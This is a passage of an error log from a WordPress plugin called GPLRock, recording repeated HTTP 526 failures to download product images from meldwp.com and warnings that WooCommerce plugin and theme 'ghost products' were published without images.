product super-product-variation-swatches-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:22:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/super-product-variation-swatches-for-woocommerce-30849.webp for product super-product-variation-swatches-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:22:25 UTC] GPLRock: Image download failed for product super-product-variation-swatches-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:22:27 UTC] GPLRock: Image download failed for product super-product-variation-swatches-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:22:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/super-product-variation-swatches-for-woocommerce-30849.webp for product super-product-variation-swatches-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:22:29 UTC] GPLRock WARNING: Image download failed for product super-product-variation-swatches-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/super-product-variation-swatches-for-woocommerce-30849.webp [05-Apr-2026 15:22:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: super-product-variation-swatches-for-woocommerce [05-Apr-2026 15:23:24 UTC] GPLRock: Image download failed for product woocommerce-product-grid-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:23:26 UTC] GPLRock: Image download failed for product woocommerce-product-grid-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:23:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-grid-builder-31831.webp for product woocommerce-product-grid-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:23:28 UTC] GPLRock: Image download failed for product woocommerce-product-grid-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:23:30 UTC] GPLRock: Image download failed for product woocommerce-product-grid-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:23:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-grid-builder-31831.webp for product woocommerce-product-grid-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:23:32 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-grid-builder. URL: https://meldwp.com/wp-content/uploads/woocommerce-product-grid-builder-31831.webp [05-Apr-2026 15:23:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-grid-builder [05-Apr-2026 15:23:33 UTC] GPLRock: Image download failed for product ramom-school-multi-branch-school-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:23:35 UTC] GPLRock: Image download failed for product ramom-school-multi-branch-school-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:23:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ramom-school---multi-branch-school-management-system-28507.webp for product ramom-school-multi-branch-school-management-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:23:37 UTC] GPLRock: Image download failed for product ramom-school-multi-branch-school-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:23:39 UTC] GPLRock: Image download failed for product ramom-school-multi-branch-school-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:23:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ramom-school---multi-branch-school-management-system-28507.webp for product ramom-school-multi-branch-school-management-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:23:41 UTC] GPLRock WARNING: Image download failed for product ramom-school-multi-branch-school-management-system. URL: https://meldwp.com/wp-content/uploads/ramom-school---multi-branch-school-management-system-28507.webp [05-Apr-2026 15:23:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ramom-school-multi-branch-school-management-system [05-Apr-2026 15:23:41 UTC] GPLRock: Image download failed for product woocommerce-affiliates-coupon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:23:43 UTC] GPLRock: Image download failed for product woocommerce-affiliates-coupon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:23:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-affiliates-coupon-13443.webp for product woocommerce-affiliates-coupon after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:23:46 UTC] GPLRock: Image download failed for product woocommerce-affiliates-coupon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:23:48 UTC] GPLRock: Image download failed for product woocommerce-affiliates-coupon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:23:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-affiliates-coupon-13443.webp for product woocommerce-affiliates-coupon after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:23:50 UTC] GPLRock WARNING: Image download failed for product woocommerce-affiliates-coupon. URL: https://meldwp.com/wp-content/uploads/woocommerce-affiliates-coupon-13443.webp [05-Apr-2026 15:23:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-affiliates-coupon [05-Apr-2026 15:23:50 UTC] GPLRock: Image download failed for product woocommerce-cart-variation-switcher-change-variant-in-cart (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:23:52 UTC] GPLRock: Image download failed for product woocommerce-cart-variation-switcher-change-variant-in-cart (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:23:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-cart-variation-switcher--change-variant-in-cart-24015.webp for product woocommerce-cart-variation-switcher-change-variant-in-cart after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:23:54 UTC] GPLRock: Image download failed for product woocommerce-cart-variation-switcher-change-variant-in-cart (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:23:56 UTC] GPLRock: Image download failed for product woocommerce-cart-variation-switcher-change-variant-in-cart (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:23:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-cart-variation-switcher--change-variant-in-cart-24015.webp for product woocommerce-cart-variation-switcher-change-variant-in-cart after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:23:58 UTC] GPLRock WARNING: Image download failed for product woocommerce-cart-variation-switcher-change-variant-in-cart. URL: https://meldwp.com/wp-content/uploads/woocommerce-cart-variation-switcher--change-variant-in-cart-24015.webp [05-Apr-2026 15:23:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-cart-variation-switcher-change-variant-in-cart [05-Apr-2026 15:23:59 UTC] GPLRock: Image download failed for product modern-video-reel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:01 UTC] GPLRock: Image download failed for product modern-video-reel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/modern-video-reel-15304.webp for product modern-video-reel after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:24:03 UTC] GPLRock: Image download failed for product modern-video-reel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:05 UTC] GPLRock: Image download failed for product modern-video-reel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/modern-video-reel-15304.webp for product modern-video-reel after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:24:07 UTC] GPLRock WARNING: Image download failed for product modern-video-reel. URL: https://meldwp.com/wp-content/uploads/modern-video-reel-15304.webp [05-Apr-2026 15:24:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: modern-video-reel [05-Apr-2026 15:24:07 UTC] GPLRock: Image download failed for product inspect-woocommerce-product-filter-search (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:09 UTC] GPLRock: Image download failed for product inspect-woocommerce-product-filter-search (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/inspect---woocommerce-product-filter--search-19037.webp for product inspect-woocommerce-product-filter-search after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:24:12 UTC] GPLRock: Image download failed for product inspect-woocommerce-product-filter-search (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:14 UTC] GPLRock: Image download failed for product inspect-woocommerce-product-filter-search (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/inspect---woocommerce-product-filter--search-19037.webp for product inspect-woocommerce-product-filter-search after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:24:16 UTC] GPLRock WARNING: Image download failed for product inspect-woocommerce-product-filter-search. URL: https://meldwp.com/wp-content/uploads/inspect---woocommerce-product-filter--search-19037.webp [05-Apr-2026 15:24:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: inspect-woocommerce-product-filter-search [05-Apr-2026 15:24:16 UTC] GPLRock: Image download failed for product mega-main-extensions-all-in-one-addons-for-wpbakery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:18 UTC] GPLRock: Image download failed for product mega-main-extensions-all-in-one-addons-for-wpbakery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mega-main-extensions---all-in-one-addons-for-wpbakery-31511.webp for product mega-main-extensions-all-in-one-addons-for-wpbakery after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:24:20 UTC] GPLRock: Image download failed for product mega-main-extensions-all-in-one-addons-for-wpbakery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:22 UTC] GPLRock: Image download failed for product mega-main-extensions-all-in-one-addons-for-wpbakery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mega-main-extensions---all-in-one-addons-for-wpbakery-31511.webp for product mega-main-extensions-all-in-one-addons-for-wpbakery after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:24:25 UTC] GPLRock WARNING: Image download failed for product mega-main-extensions-all-in-one-addons-for-wpbakery. URL: https://meldwp.com/wp-content/uploads/mega-main-extensions---all-in-one-addons-for-wpbakery-31511.webp [05-Apr-2026 15:24:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mega-main-extensions-all-in-one-addons-for-wpbakery [05-Apr-2026 15:24:25 UTC] GPLRock: Image download failed for product woocommerce-pdf-invoice-packing-slip-shipping-label (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:27 UTC] GPLRock: Image download failed for product woocommerce-pdf-invoice-packing-slip-shipping-label (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-pdf-invoice-packing-slip--shipping-label-4476.webp for product woocommerce-pdf-invoice-packing-slip-shipping-label after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:24:29 UTC] GPLRock: Image download failed for product woocommerce-pdf-invoice-packing-slip-shipping-label (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:31 UTC] GPLRock: Image download failed for product woocommerce-pdf-invoice-packing-slip-shipping-label (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-pdf-invoice-packing-slip--shipping-label-4476.webp for product woocommerce-pdf-invoice-packing-slip-shipping-label after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:24:33 UTC] GPLRock WARNING: Image download failed for product woocommerce-pdf-invoice-packing-slip-shipping-label. URL: https://meldwp.com/wp-content/uploads/woocommerce-pdf-invoice-packing-slip--shipping-label-4476.webp [05-Apr-2026 15:24:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-pdf-invoice-packing-slip-shipping-label [05-Apr-2026 15:24:34 UTC] GPLRock: Image download failed for product slick-slider-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:36 UTC] GPLRock: Image download failed for product slick-slider-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/slick-slider-addon-for-wpbakery-page-builder-17978.webp for product slick-slider-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:24:38 UTC] GPLRock: Image download failed for product slick-slider-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:40 UTC] GPLRock: Image download failed for product slick-slider-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/slick-slider-addon-for-wpbakery-page-builder-17978.webp for product slick-slider-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:24:42 UTC] GPLRock WARNING: Image download failed for product slick-slider-addon-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/slick-slider-addon-for-wpbakery-page-builder-17978.webp [05-Apr-2026 15:24:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: slick-slider-addon-for-wpbakery-page-builder [05-Apr-2026 15:24:42 UTC] GPLRock: Image download failed for product sharp-gallery-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:44 UTC] GPLRock: Image download failed for product sharp-gallery-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sharp-gallery-for-wordpress-3488.webp for product sharp-gallery-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:24:46 UTC] GPLRock: Image download failed for product sharp-gallery-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:49 UTC] GPLRock: Image download failed for product sharp-gallery-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:24:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sharp-gallery-for-wordpress-3488.webp for product sharp-gallery-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:24:51 UTC] GPLRock WARNING: Image download failed for product sharp-gallery-for-wordpress. URL: https://meldwp.com/wp-content/uploads/sharp-gallery-for-wordpress-3488.webp [05-Apr-2026 15:24:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sharp-gallery-for-wordpress [05-Apr-2026 15:25:27 UTC] GPLRock: Image download failed for product politpress-multipurpose-political-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:25:29 UTC] GPLRock: Image download failed for product politpress-multipurpose-political-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:25:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/politpress---multipurpose-political-wordpress-theme-5522.webp for product politpress-multipurpose-political-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:25:31 UTC] GPLRock: Image download failed for product politpress-multipurpose-political-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:25:34 UTC] GPLRock: Image download failed for product politpress-multipurpose-political-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:25:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/politpress---multipurpose-political-wordpress-theme-5522.webp for product politpress-multipurpose-political-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:25:36 UTC] GPLRock WARNING: Image download failed for product politpress-multipurpose-political-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/politpress---multipurpose-political-wordpress-theme-5522.webp [05-Apr-2026 15:25:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: politpress-multipurpose-political-wordpress-theme [05-Apr-2026 15:25:36 UTC] GPLRock: Image download failed for product thecraft-responsive-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:25:38 UTC] GPLRock: Image download failed for product thecraft-responsive-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:25:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/thecraft--responsive-multipurpose-wordpress-theme-6562.webp for product thecraft-responsive-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:25:40 UTC] GPLRock: Image download failed for product thecraft-responsive-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:25:42 UTC] GPLRock: Image download failed for product thecraft-responsive-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:25:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/thecraft--responsive-multipurpose-wordpress-theme-6562.webp for product thecraft-responsive-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:25:44 UTC] GPLRock WARNING: Image download failed for product thecraft-responsive-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/thecraft--responsive-multipurpose-wordpress-theme-6562.webp [05-Apr-2026 15:25:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: thecraft-responsive-multipurpose-wordpress-theme [05-Apr-2026 15:25:44 UTC] GPLRock: Image download failed for product clivo-portfolio-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:25:47 UTC] GPLRock: Image download failed for product clivo-portfolio-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:25:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/clivo---portfolio--agency-wordpress-theme-20901.webp for product clivo-portfolio-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:25:49 UTC] GPLRock: Image download failed for product clivo-portfolio-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:25:51 UTC] GPLRock: Image download failed for product clivo-portfolio-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:25:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/clivo---portfolio--agency-wordpress-theme-20901.webp for product clivo-portfolio-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:25:53 UTC] GPLRock WARNING: Image download failed for product clivo-portfolio-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/clivo---portfolio--agency-wordpress-theme-20901.webp [05-Apr-2026 15:25:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: clivo-portfolio-agency-wordpress-theme [05-Apr-2026 15:25:53 UTC] GPLRock: Image download failed for product cesar-photography-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:25:55 UTC] GPLRock: Image download failed for product cesar-photography-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:25:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cesar--photography-wordpress-33565.webp for product cesar-photography-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:25:58 UTC] GPLRock: Image download failed for product cesar-photography-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:00 UTC] GPLRock: Image download failed for product cesar-photography-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cesar--photography-wordpress-33565.webp for product cesar-photography-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:26:02 UTC] GPLRock WARNING: Image download failed for product cesar-photography-wordpress. URL: https://meldwp.com/wp-content/uploads/cesar--photography-wordpress-33565.webp [05-Apr-2026 15:26:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cesar-photography-wordpress [05-Apr-2026 15:26:02 UTC] GPLRock: Image download failed for product lilac-fashion-responsive-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:04 UTC] GPLRock: Image download failed for product lilac-fashion-responsive-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lilac---fashion-responsive-woocommerce-wordpress-theme-22415.webp for product lilac-fashion-responsive-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:26:06 UTC] GPLRock: Image download failed for product lilac-fashion-responsive-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:08 UTC] GPLRock: Image download failed for product lilac-fashion-responsive-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lilac---fashion-responsive-woocommerce-wordpress-theme-22415.webp for product lilac-fashion-responsive-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:26:11 UTC] GPLRock WARNING: Image download failed for product lilac-fashion-responsive-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lilac---fashion-responsive-woocommerce-wordpress-theme-22415.webp [05-Apr-2026 15:26:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lilac-fashion-responsive-woocommerce-wordpress-theme [05-Apr-2026 15:26:11 UTC] GPLRock: Image download failed for product its-brain-responsive-bootstrap-3-admin-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:13 UTC] GPLRock: Image download failed for product its-brain-responsive-bootstrap-3-admin-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/its-brain---responsive-bootstrap-3-admin-template-8702.webp for product its-brain-responsive-bootstrap-3-admin-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:26:15 UTC] GPLRock: Image download failed for product its-brain-responsive-bootstrap-3-admin-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:17 UTC] GPLRock: Image download failed for product its-brain-responsive-bootstrap-3-admin-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/its-brain---responsive-bootstrap-3-admin-template-8702.webp for product its-brain-responsive-bootstrap-3-admin-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:26:19 UTC] GPLRock WARNING: Image download failed for product its-brain-responsive-bootstrap-3-admin-template. URL: https://meldwp.com/wp-content/uploads/its-brain---responsive-bootstrap-3-admin-template-8702.webp [05-Apr-2026 15:26:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: its-brain-responsive-bootstrap-3-admin-template [05-Apr-2026 15:26:19 UTC] GPLRock: Image download failed for product vayvo-media-streaming-membership-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:22 UTC] GPLRock: Image download failed for product vayvo-media-streaming-membership-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vayvo---media-streaming--membership-wordpress-theme-30931.webp for product vayvo-media-streaming-membership-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:26:24 UTC] GPLRock: Image download failed for product vayvo-media-streaming-membership-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:26 UTC] GPLRock: Image download failed for product vayvo-media-streaming-membership-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vayvo---media-streaming--membership-wordpress-theme-30931.webp for product vayvo-media-streaming-membership-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:26:28 UTC] GPLRock WARNING: Image download failed for product vayvo-media-streaming-membership-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vayvo---media-streaming--membership-wordpress-theme-30931.webp [05-Apr-2026 15:26:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vayvo-media-streaming-membership-wordpress-theme [05-Apr-2026 15:26:28 UTC] GPLRock: Image download failed for product zungo-creative-consulting-business-wordpress-landing-page-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:31 UTC] GPLRock: Image download failed for product zungo-creative-consulting-business-wordpress-landing-page-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zungo---creative-consulting-business-wordpress-landing-page-theme-20559.webp for product zungo-creative-consulting-business-wordpress-landing-page-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:26:33 UTC] GPLRock: Image download failed for product zungo-creative-consulting-business-wordpress-landing-page-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:35 UTC] GPLRock: Image download failed for product zungo-creative-consulting-business-wordpress-landing-page-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zungo---creative-consulting-business-wordpress-landing-page-theme-20559.webp for product zungo-creative-consulting-business-wordpress-landing-page-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:26:37 UTC] GPLRock WARNING: Image download failed for product zungo-creative-consulting-business-wordpress-landing-page-theme. URL: https://meldwp.com/wp-content/uploads/zungo---creative-consulting-business-wordpress-landing-page-theme-20559.webp [05-Apr-2026 15:26:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zungo-creative-consulting-business-wordpress-landing-page-theme [05-Apr-2026 15:26:37 UTC] GPLRock: Image download failed for product fastex-logistics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:40 UTC] GPLRock: Image download failed for product fastex-logistics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fastex---logistics-wordpress-theme-9480.webp for product fastex-logistics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:26:42 UTC] GPLRock: Image download failed for product fastex-logistics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:44 UTC] GPLRock: Image download failed for product fastex-logistics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fastex---logistics-wordpress-theme-9480.webp for product fastex-logistics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:26:46 UTC] GPLRock WARNING: Image download failed for product fastex-logistics-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fastex---logistics-wordpress-theme-9480.webp [05-Apr-2026 15:26:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fastex-logistics-wordpress-theme [05-Apr-2026 15:26:46 UTC] GPLRock: Image download failed for product ukko-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:48 UTC] GPLRock: Image download failed for product ukko-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ukko---personal-portfolio-wordpress-theme-6204.webp for product ukko-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:26:51 UTC] GPLRock: Image download failed for product ukko-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:53 UTC] GPLRock: Image download failed for product ukko-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:26:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ukko---personal-portfolio-wordpress-theme-6204.webp for product ukko-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: 